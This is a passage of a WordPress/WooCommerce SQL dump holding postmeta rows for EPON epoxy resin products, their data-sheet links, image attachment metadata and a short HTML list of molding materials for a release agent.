'a:6:{s:5:"width";i:331;s:6:"height";i:152;s:4:"file";s:36:"2016/08/release1-e1472229931134.jpeg";s:5:"sizes";a:3:{s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"release1-e1472229931134-250x152.jpeg";s:5:"width";i:250;s:6:"height";i:152;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"release1-e1472229931134-200x152.jpeg";s:5:"width";i:200;s:6:"height";i:152;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"release1-e1472229931134-225x152.jpeg";s:5:"width";i:225;s:6:"height";i:152;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8944, 894, '_edit_lock', '1472230868:1'); 
INSERT INTO `wp_postmeta` VALUES (8945, 894, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (8946, 894, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:331;s:6:"height";i:152;s:4:"file";s:13:"release1.jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (8947, 707, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8948, 895, '_edit_lock', '1474469952:2'); 
INSERT INTO `wp_postmeta` VALUES (8949, 895, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8965, 899, '_wp_attached_file', '2016/08/8281.pdf'); 
INSERT INTO `wp_postmeta` VALUES (8966, 895, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8967, 895, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8968, 895, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8969, 895, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8970, 895, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (8971, 895, '318_custom_list_file', 'a:2:{s:32:"ae36058d5004da1f564e57a7ebd35310";a:3:{s:4:"name";s:9:"EPON 8281";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/8281.pdf";s:4:"desc";s:13:"EPON 8281 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (8972, 895, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (8973, 895, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8974, 895, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8975, 895, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8976, 895, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8977, 895, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8978, 895, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8979, 895, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8980, 895, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8981, 895, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8982, 895, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8983, 895, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8984, 895, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8985, 895, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8986, 895, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8987, 895, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8988, 895, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8989, 895, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8990, 895, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8991, 895, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8992, 895, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8993, 895, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8994, 895, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8995, 895, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8996, 895, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8997, 895, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8998, 895, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8999, 895, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9000, 895, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9001, 895, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9002, 900, '_edit_lock', '1474469472:2'); 
INSERT INTO `wp_postmeta` VALUES (9003, 900, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9004, 901, '_wp_attached_file', '2016/08/872.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9005, 900, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9006, 900, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9007, 900, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9008, 900, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9009, 900, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9010, 900, '318_custom_list_file', 'a:2:{s:32:"b8fb5f1e3e76d3f3ba3fbcfa875b2526";a:3:{s:4:"name";s:8:"EPON 872";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/872.pdf";s:4:"desc";s:12:"EPON 872 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9011, 900, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (9012, 900, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9013, 900, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9014, 900, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9015, 900, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9016, 900, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9017, 900, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9018, 900, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9019, 900, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9020, 900, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9021, 900, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9022, 900, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9023, 900, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9024, 900, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9025, 900, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9026, 900, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9027, 900, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9028, 900, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9029, 900, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9030, 900, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9031, 900, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9032, 900, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9033, 900, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9034, 900, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9035, 900, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9036, 900, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9037, 900, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9038, 900, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9039, 900, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9040, 900, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9041, 900, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9042, 902, '_wp_attached_file', '2016/08/EPON-blended-EPOXY.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9043, 902, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2832;s:6:"height";i:4256;s:4:"file";s:30:"2016/08/EPON-blended-EPOXY.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-532x800.jpg";s:5:"width";i:532;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPON-blended-EPOXY-768x1154.jpg";s:5:"width";i:768;s:6:"height";i:1154;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:32:"EPON-blended-EPOXY-1065x1600.jpg";s:5:"width";i:1065;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:30:"EPON-blended-EPOXY-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9044, 903, '_edit_lock', '1474468860:2'); 
INSERT INTO `wp_postmeta` VALUES (9045, 903, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9046, 904, '_wp_attached_file', '2016/08/813.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9047, 903, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9048, 903, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9049, 903, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9050, 903, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9051, 903, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9052, 903, '318_custom_list_file', 'a:2:{s:32:"79af79b629d35c95ee5938589973339f";a:3:{s:4:"name";s:8:"EPON 813";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/813.pdf";s:4:"desc";s:12:"EPON 813 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9053, 903, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (9054, 903, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9055, 903, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9056, 903, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9057, 903, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9058, 903, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9059, 903, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9060, 903, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9061, 903, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9062, 903, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9063, 903, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9064, 903, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9065, 903, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9066, 903, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9067, 903, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9068, 903, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9069, 903, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9070, 903, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9071, 903, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9072, 903, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9073, 903, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9074, 903, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9075, 903, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9076, 903, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9077, 903, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9078, 903, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9079, 903, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9080, 903, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9081, 903, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9082, 903, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9083, 425, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 89 is formulated to provide unmatched utility in compression, injection and transfer molding with the following materials. <a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n<table style="height: 164px;" width="576">\r\n<tbody>\r\n<tr>\r\n<td width="167">•       Organic Polymer</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Thermosetting resins</td>\r\n<td width="168">•          Elastomers (Natural and Synthetic)</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Neoprene</td>\r\n<td width="168">•          Melamine</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>'); 
INSERT INTO `wp_postmeta` VALUES (9084, 425, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9085, 905, '_wp_attached_file', '2016/08/shutterstock_18414949-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9086, 905, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3072;s:6:"height";i:2304;s:4:"file";s:35:"2016/08/shutterstock_18414949-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"shutterstock_18414949-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"shutterstock_18414949-1-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"shutterstock_18414949-1-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"shutterstock_18414949-1-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"shutterstock_18414949-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"shutterstock_18414949-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"shutterstock_18414949-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"shutterstock_18414949-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9087, 906, '_wp_attached_file', '2016/08/shutterstock_126121829.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9088, 906, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2600;s:6:"height";i:1733;s:4:"file";s:34:"2016/08/shutterstock_126121829.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_126121829-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_126121829-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_126121829-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_126121829-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_126121829-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_126121829-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_126121829-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_126121829-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9089, 907, '_wp_attached_file', '2016/08/shutterstock_257574442.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9090, 907, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:3000;s:4:"file";s:34:"2016/08/shutterstock_257574442.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_257574442-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_257574442-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_257574442-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_257574442-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_257574442-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_257574442-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_257574442-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_257574442-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9091, 908, '_wp_attached_file', '2016/08/shutterstock_373295623.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9092, 908, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4000;s:4:"file";s:34:"2016/08/shutterstock_373295623.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373295623-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_373295623-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_373295623-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_373295623-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373295623-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_373295623-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_373295623-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_373295623-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9093, 909, '_wp_attached_file', '2016/08/shutterstock_462371947.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9094, 909, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4896;s:6:"height";i:3264;s:4:"file";s:34:"2016/08/shutterstock_462371947.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_462371947-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_462371947-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_462371947-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_462371947-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_462371947-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_462371947-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_462371947-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_462371947-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9095, 910, '_edit_lock', '1479929022:3'); 
INSERT INTO `wp_postmeta` VALUES (9096, 910, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (9097, 911, '_wp_attached_file', '2016/08/815C.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9098, 910, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9099, 910, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9100, 910, '312_default_editor', ''); 
